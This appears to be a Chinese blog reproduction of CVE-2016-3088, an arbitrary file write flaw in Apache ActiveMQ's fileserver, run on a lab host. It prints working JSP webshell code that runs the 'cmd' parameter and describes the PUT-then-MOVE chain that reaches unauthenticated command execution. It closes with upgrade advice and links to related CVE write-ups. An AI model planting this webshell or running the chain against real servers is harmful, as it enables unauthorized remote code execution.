Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现
一、漏洞描述
该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。
二、漏洞影响版本
Apache ActiveMQ 5.0.0 - 5.13.2
三、漏洞环境搭建
1、官网下载apache-activemq-5.7.0-bin.tar 下载地址:http://activemq.apache.org/download-archives.html
2、解压
3、启动,进入bin目录下,运行./activemq start
4、浏览器访问http://192.168.10.149:8161/,如下图可以看到成功搭建环境
四、漏洞复现
1、PUT上传一个jsp的webshell到fileserver目录,下图可以看到成功上传jsp文件
Jsp文件内容:
<%@ page import="java.io.*"%> <% out.print("Hello</br>"); String strcmd=request.getParameter("cmd"); String line=null; Process p=Runtime.getRuntime().exec(strcmd); BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream())); while((line=br.readLine())!=null){ out.print(line+"</br>"); } %>
2、浏览器访问http://192.168.10.149:8161/fileserver/1.jsp,下图可以看到fileserver目录下的webshell没有被解析,说明fileserver目录没有执行权限
3、利用该版本存在物理路径泄露漏洞,爆一下绝对路径
4、利用Move方法将webshell移入admin目录下,如下图所示成功把文件移入到admin目录
5、利用该版本存在的未授权访问漏洞,不用登录,访问http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下图可以看到成功执行命令
五、漏洞防御
1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。
---------------------------------------------------------------------------------
参考: https://www.secpulse.com/archives/60064.html
总结
以上所述是小编给大家介绍的Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对脚本之家网站的支持!
如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!
- ActiveMQ任意文件写入漏洞(版本在5.12.X前CVE-2016-3088)
- 利用Vulnhub复现漏洞 - ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)
- 利用Vulnhub复现漏洞 - Gitlab 任意文件读取漏洞(CVE-2016-9086)
- CVE-2017-8464 LNK文件(快捷方式)远程代码执行漏洞复现
- 利用Vulnhub复现漏洞 - mini_httpd任意文件读取漏洞(CVE-2018-18778)
- Apache struts2 Freemarker标签远程命令执行_CVE-2017-12611(S2-053)漏洞复现
- Apache 提权漏洞(CVE-2019-0211)复现
- WebLogic 任意文件上传远程代码执行_CVE-2018-2894漏洞复现
- CVE-2016-1240(Tomcat本地提权漏洞分析与复现)
- jenkins任意文件读取漏洞复现与分析 -CVE-2018-1999002
- Apache Roller服务器侧请求伪造和文件枚举漏洞(CVE-2018-17198)
- Apache Commons FileUpload不安全临时文件创建漏洞(CVE-2013-0248)
- 利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞(CVE-2016–3714)
- Apache HTTP Server HTTP响应分离漏洞(CVE-2016-4975)
- Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现
- ActiveMQ漏洞( CVE-2016-3088) 验证
- CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
- Tomcat任意文件上传漏洞CVE-2017-12615复现测试
- Apache struts2 namespace远程命令执行_CVE-2018-11776(S2-057)漏洞复现
- [CVE-2014-8959] phpmyadmin任意文件包含漏洞分析